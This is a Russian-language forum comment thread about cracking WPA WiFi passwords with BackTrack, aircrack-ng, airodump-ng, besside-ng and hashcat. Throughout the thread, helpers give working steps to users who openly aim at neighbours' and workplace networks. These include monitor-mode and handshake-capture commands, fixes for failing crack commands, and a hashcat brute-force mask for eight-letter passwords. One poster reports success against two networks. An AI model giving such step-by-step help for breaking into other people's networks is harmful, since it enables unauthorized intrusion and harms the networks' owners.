http://vk.com/id176915587?z=photo176915587_302913839%2Falbum1769 15587_00%2Frev

посмотрите пожалуйста

http://vk.com/id176915587?z=photo176915587_302913839%2Falbum1769 15587_00%2Frev
посмотрите пожалуйста


Собственно, вывод программы яснее быть не может - жалуется, что нет файлов (ни словарей, ни с хэндшейком). Где лежат оба файла? Чтобы заработала та команда, что Вы ввели, необходимо, чтобы файл словаря и с ХШ лежали в папке /root

Спасибо огромное! попробую положить в папку Root.

Словарь лежал на рабочем столе

Stranger@

Ваши драйвера отлично работают,но у меня были и свои аналогичные,я ж писал что с ралинка все версии качал и с нашего форума модифицированные. Кстати реально передёргивание помогает,вот только у меня не хватило фантазии проделать тот же номер на бэктреке ( Сейчас всё снёс и бэктрек и слакс и вэй,надо заново скачать,я думал он не подерживает горячее распознование юсб и если сразу не завёлся то бесполезно дёргать. Ещё оказалось что на юсб 3,0 у меня косяк идёт и с длинным юсб кабелем тоже глючит ( Сижу у окна сейчас.

А если у меня опять бэктрек при подключении выдаст что нет влан 0 ? оворят можно как то поднять адаптер,если его не видно ? У меня на 3070 вроде. В общем скачаю ещё раз бт5 р3 с офф сайта,может увидет.

и вот снова я теперь программа не может найти файл testcap. он сам должен появится в папке root или его надо как то завести? в папку root положил все как вы сказали, то есть словарь, и там сами "образовались" wpa.cap , wep.cap , besside, а вот startcap net

и еще, пытался запихать в пaпку root 8 Гб словарь, не влазиет, места всего 1,1Гб, возможно увеличить вместимость папки?

фото экрана можно посмотреть

http://vk.com/id176915587?z=photo176915587_302965919%2Falbum1769 15587_00%2Frev

помогите, please! ;(

Насколько я понимаю, используется beessid-ng. Тогда откуда в руте взяться файлу testcap? Просто поменяйте в команде aircrack-ng testcap.cap на wpa.cap, и будет Вам счастье =)

Спасибо огромное!!! Все получилось, взломал одну сеть, все ок, за исключением что она слабовата. Взломал вторую, с хорошим сигналом, вписываю пароль, а мне в ответ "ключ доступа не совпадает" что такое, не понимаю, программа дважды выдает один и тот же пароль наверное сеть супер секретная! ))

помогите чайнику...

пользуюсь BT5 r3..адаптер альфа rtl8187(AWUS036H)

Делаю все как в статье

1.root@bt:~# iwconfig

выбираю свой wlan0

далее в режим монитора airmon-ng start wlan0

после airodump-ng mon0

и вылазит вот такое окошко... http://i074.radikal.ru/1306/f1/f63fce705185.jpg

сканирование не прекращается ...строка для ввода команды не появляется...(как на примере в начале статьи),каналы постоянно меняются,и собираются пакеты.происходит это безобразие без остановки,вот уже 25 минут...нет не строки stoped...,ни .root@bt:~#...

вот для сравнения рисунок со статьи

http://s017.radikal.ru/i444/1112/82/c647aba8f3ad.jpg

подскажите что не так...

пользуюсь VMware Workstation но не думаю что это что то меняет...

буду благодарен за скорые ответы...за отпуск нужно быстро освоить вардрайвинг

Чтобы появилась заветная надпись Stopped, нужно остановить выполнение airodump-ng нажатием Ctrl+C. После того, как вы выбрали интересующую точку, уточняете ключами её канал (-с X), BSSID (--bssid XX:XX:XX:XX:XX:XX) и имя файла (-w filename), куда будет писаться хэндшейк. Ну и далее по инструкции.

Здравствуйте. Спасибо за хороший мануал. Есть несколько вопросов.

1. Ловил пакеты с одной сети командой airodump-ng --bssid -w testcap mon0. Поймал всего 1 хендшейк в котором был Beacon frame и пакеты msg (2/4) и msg (3/4). Я так понимаю подобрать пароль используя данный cap файл не получится? Нужны 1 и 2 обязательно?

2. Запускал besside-ng mon0. Создаются cap и log файлы пустые и не заполняются. Или они должны увеличивать размер только когда хендшейки поймают?

3. При запуске hashcat-plus возникает вот такая ошибка. Вчем может быть проблема?

http://data2.floomby.com/files/previews/27_6_2013/0Etv3lSLK0SM1KBG5JebQ.jpg

1. Да, для перебора пароля обязательно наличие 1 и 2 пакетов хэндшейка в файле перехвата.

2. Нет, файлы должны заполняться сразу, с момента запуска программы.

3. Ошибка обычно означает, что либо нет необходимой карточки в системе, либо есть проблема с SDK. Пишите конфигурацию системы, какие драйверы какой версии стоят, что за ОС.

1. Да, для перебора пароля обязательно наличие 1 и 2 пакетов хэндшейка в файле перехвата.
2. Нет, файлы должны заполняться сразу, с момента запуска программы.
3. Ошибка обычно означает, что либо нет необходимой карточки в системе, либо есть проблема с SDK. Пишите конфигурацию системы, какие драйверы какой версии стоят, что за ОС.


Спасибо за ответы.

1. Я так и думал ))

2. Тут наверно не совсем верный ответ. Похоже происходит так. Лог пишется как только будет пойман хендшейк с 1 и 2 пакетом, до этого файлы остаются пустыми. Когда ловишь пакеты с одной сети, то пишутся в cap файл все пакеты, а при использовании команды besside-ng mon0 только нужные и когда поймал Beacon frame и пакеты msg (1/4) и msg (2/4) создается запись в логе и эти 3 пакета попадат в файл wep.cap.

3. На англоязычном форуме написали что надо дрова обновить. Система Win7, видюха Radeon HD 5870. Дрова не обновлял уже очень долго, наверно действительно в этом проблема

Тогда по поводу третьего пункта - не торопитесь ставить самые новые. На разных ресурсах по-разному, но люди пишут, что чаще всего работает с Catalyst 12.8 либо 13.1.

Доброго времени суток!

Впринципе всё понятно, кроме одного...

Можно подробнее описать брутфорс?

100% известно, что пароль состоит из 8 заглавных латинских букв.

шифрование ВПА, пароль рандомный, атака по словарю бесполезна.

Как и с помощью чего сделать подбор по вышеозвученным параметрам? (пароль вида XYZQWERTY)

Не в курсе возможно такое и обсуждалось ранее. Но как мне известно в интерфейс роутера можно зайти 192.168.1.1. при этом не обязательно чтобы роутер и ноут были соединены кабелем rg45

Есть ли способ обмануть роутер и зайти в его настройки используя свой ноутбук и узнать пароль. Возможно там аутентификация проходит по мак адресу, который можно ведь подменить

Доброго времени суток!
Впринципе всё понятно, кроме одного...
Можно подробнее описать брутфорс?
100% известно, что пароль состоит из 8 заглавных латинских букв.
шифрование ВПА, пароль рандомный, атака по словарю бесполезна.
Как и с помощью чего сделать подбор по вышеозвученным параметрам? (пароль вида XYZQWERTY)


например, используйте HashCat-plus. Используйте конвертер, чтобы файл с перехваченным паролем привести в .hccap. Потом указываете в кошке путь к этому файлу, тип шифрования - WPA/WPA2, атака - bruteforce. Пользовательский набор символов: 1 = ?u, маска для атаки ?1?1?1?1?1?1?1?1, увеличивать длину - галочку НЕ ставить. Пуск =)

Всем здравия. Я юзаю альфу авус036аш. Раньше тестил бектрак с флэхи всё было ок относительно >>

w reg set BO

iwconfig wlan1 txpower 27

сейчас установил бектрак в VMWare Workstation (именно заинсталил)

root@bt:~# w reg set BO

02:59:49 up 23 min, 3 users, load average: 0.20, 0.16, 0.19

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

root@bt:~# iwconfig wlan0 txpower 27

Error for wireless request "Set Tx Power" (8B26) :

SET failed on device wlan0 ; Invalid argument.

как думаете связано с указанием локации при установке? Буду благодарен за конструктив..

Ошибка была в команде.

Есть точка доступа cisco. Есть ли возможность провести атаку не брутфорсом, а каким-либо другим методом. Ничего о этой точке кроме Bssid и Essid не известно

Подскажите плз... а существует ли подобный дистрибутив BackTrack (со всеми нужными дровами, настройками и т.д.) для установки на жесткий диск?

и еще вопрос...

если скачать образ BackTrack для wmware, то получается можно запускать под виндой на виртуальной машине?

Дистрибутив Backtrack можно и на винчестер поставить или Вам нужна какая-то другая сборка для вардрайвинга (не Backtrack)? Уточните, пожалуйста.

Да, если запускать на виртуальной машине, это можно делать под Windows, Вы совершенно правы.

Дистрибутив Backtrack можно и на винчестер поставить
или Вам нужна какая-то другая сборка для вардрайвинга (не Backtrack)? Уточните, пожалуйста.
Да, если запускать на виртуальной машине, это можно делать под Windows, Вы совершенно правы.


H3L1X спасибо за оперативный ответ...

дело в том, что нашел старенький ноут, решил его поставить на пару дней для снифинга wifi...

но на ноуте отсутствует cd/dvd дисковод))

попробовал загрузить через флешку - безрезультатно, хотя в биос последовательность устройств правильная и флешка нормальная, т.к. на других компах ОС с неё загружается нормально...

купил внешний cd/dvd привод, выставил его в биос первым... опять ничего... ноут упорно игнорирует внешние устройства((

при этом, на данный ноут я установил windows 7 по сети и решил установить Backtrack также по сети либо установить VmWare и загрузить BT на виртуалке...

конечно больше хочется поставить BT на железо, так что мне нужен дистрибутив (сборка) для вардрайвинга.

Здорово братва! Возможно ли взломать WI FI c шифрованием WPA2 без wordlista?

Здорово братва! Возможно ли взломать WI FI c шифрованием WPA2 без wordlista?


/threadnav310835-1-10-wps.html

Есть:

ТПлинк 7200

два нетбука со встроенными вифи

wifisky 2000mW+36dbi - вот такая штука.

две флешки на одной Бектрек 5к1 и airslax 3.2

Адаптеры с семерки видят много сетей.

в airslax не сканирует сети - вылетает(окно выскакивает и пропадает).

в бектреке ноль реультат но что то происходит.

в голове каша уже. помогите удаленно настроить за вознаграждение . аська 602302222

какими командами сохранить найденные хендшейки?

сутки сканировал - нашел 6 хендшейков, в линуксе не шарю - поверил что они автоматом в корень флешки сохранились - смотрю флеху через семерку а там ноль - файлов нет .сар

как не делать более ошибки и верняком сохранить ?

wifislax


Есть:
ТПлинк 7200
два нетбука со встроенными вифи
wifisky 2000mW+36dbi - вот такая штука.
две флешки на одной Бектрек 5к1 и airslax 3.2
Адаптеры с семерки видят много сетей.
в airslax не сканирует сети - вылетает(окно выскакивает и пропадает).
в бектреке ноль реультат но что то происходит.
в голове каша уже. помогите удаленно настроить за вознаграждение . аська 602302222


Легче всего записать на флешку wifislax (переведенная русская версия лежит тут (http://rutracker.org/forum/viewtopic.php?t=4431137) )

Пример перехвата показан тут:

http://www.youtube.com/watch?v=xdc2AOMM-D4

Хендшейк будет лежать тут:

/tmp/FeedingBottle/targetap_wpa-01.cap

Хочу взломать wi fi на работе,подойдёт ли такой роутер?

http://www.tp-linkru.com/products/details/?categoryid=238&model=TL-WR841N#/specifications

Не могу найти файл .cap

В /root пусто.

Пробовал поиском на все файлы с расширением .cap по всему диску и ничего нет. Только тестовые wpa.cap и так далее.

Handshake словил для 2 сетей.

ребят, вопрос на засыпку..... в бактраке бук определяет порядка 15 сетей, есть даже открытые, из под винды вижу только три- четыре в чем засада??? планшетник тоже видит порядка 15-20 сетей...

Я вот побывал по данным "методам" свой обычный wifi-роутер взломать с пк но единственное что нашел так это софт который показывает уже использованные пароли.

а как быть с теми паролями которые не разу не юзались. или тем рабочих нет.

Гляньте здесь статью все просто и понятно http://cheathills.ru/vzlom-wifipodbor-parolya-dlya-vzloma-wifi

ребят, вопрос на засыпку..... в бактраке бук определяет порядка 15 сетей, есть даже открытые, из под винды вижу только три- четыре в чем засада??? планшетник тоже видит порядка 15-20 сетей...

Тоже интересно, BT видит много точек, а вот Windows не все показывает

ребят, вопрос на засыпку..... в бактраке бук определяет порядка 15 сетей, есть даже открытые, из под винды вижу только три- четыре в чем засада??? планшетник тоже видит порядка 15-20 сетей...
Тоже интересно, BT видит много точек, а вот Windows не все показывает


может дело в железе, а именно его мощи и новизне?)

сам был таким же, всегда хотел взломать сеть, всегда искал халявные точки,иногда даже удавалось создавать WDS, усиливал антенну на роутере для данной операции, очень благодарен тем людям которые же оставляли точки доступа без паролей, собственно теперь уже когда имею свою точку доступа решил не защищать ее паролем, отвечу людям взаимностью так сказать ,)

кому что-то не понятно в данной статьи, могу посоветовать книгу, правда я ее полностью так и не прочитал..

по сути нет нужды во взломе - нет нужды в прочтении

Wi-фу: «боевые» приемы взлома и защиты беспроводных сетей

Автор: Владимиров А.А.

http://bulletinsite.net/index.php?id1=6&category=programmer&author=vladimirov-aa

честно прочел все, но как понимаю информация устаревшая и такой способ уже не прокатит ? Просто как-то искал способ, которым можно действительно взломать Wi-fi, но так и не удалось. Есть какой-то рабочий метод?

честно прочел все, но как понимаю информация устаревшая и такой способ уже не прокатит ? Просто как-то искал способ, которым можно действительно взломать Wi-fi, но так и не удалось. Есть какой-то рабочий метод?


Работает и еще как. Чтобы этому способу устареть- должны для начала новое шифрование придумать

А вообще чтобы попроще с тем же результатом- гугли AirSlax. Никакие команды вводить не нужно, жми только цифры нужные да и всё. Погугли. Скачаешь образ iso (195мб), на флешку поставить, + на ютубе видео по нему посмотри, вот и всё.

+ посмотри как пользоваться hashcat (для брута). Это потом уже. Сначало с AirSlax разберись.

собственно теперь уже когда имею свою точку доступа решил не защищать ее паролем, отвечу людям взаимностью так сказать ,)


А потом зядишь за своих соседей)) Причём ни за одного соседа) Как говоришь- точка открыта, т.е. доступна абсолютно всем, вот за всех и отчет держать будешь. Потом только уже не прокатит, что типо это не я, это соседи, кошка ихняя, дерево, но не я.